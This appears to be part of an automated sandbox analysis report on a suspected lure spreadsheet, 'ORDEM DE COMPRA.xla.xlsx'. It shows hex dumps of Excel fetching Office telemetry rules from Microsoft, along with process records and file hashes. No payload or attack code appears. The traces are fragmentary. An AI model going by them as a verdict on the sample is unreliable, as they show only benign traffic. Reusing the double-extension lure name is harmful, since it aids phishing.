                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                                                    Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                                                    Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                    Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                                                    Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                                                    Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                                                    Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                    Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                                                    Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                                                    2025-03-12 17:36:03 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                                                    Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.74970913.107.246.604431220C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:36:09 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:36:10 UTC470INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:36:10 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 204
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                    ETag: "0x8DC582BB6C8527A"
                                                                    x-ms-request-id: 7672a13f-c01e-002b-19c8-926e00000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173610Z-r16856dc85895qs7hC1BL1htm400000004ug000000012wyz
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:36:10 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.74971013.107.246.604431220C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:36:09 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:36:10 UTC494INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:36:10 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 2128
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                    ETag: "0x8DC582BA41F3C62"
                                                                    x-ms-request-id: 6fb1486e-801e-00a0-4fa3-912196000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173610Z-17846f7ff65knqpjhC1BL1dpcg0000000ck0000000002n6r
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:36:10 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:13:34:35
                                                                    Start date:12/03/2025
                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                    Imagebase:0xd40000
                                                                    File size:53'161'064 bytes
                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:13:35:39
                                                                    Start date:12/03/2025
                                                                    Path:C:\Windows\splwow64.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\splwow64.exe 12288
                                                                    Imagebase:0x7ff7c9e80000
                                                                    File size:163'840 bytes
                                                                    MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:13:35:54
                                                                    Start date:12/03/2025
                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDEM DE COMPRA.xla.xlsx"
                                                                    Imagebase:0xd40000
                                                                    File size:53'161'064 bytes
                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    No disassembly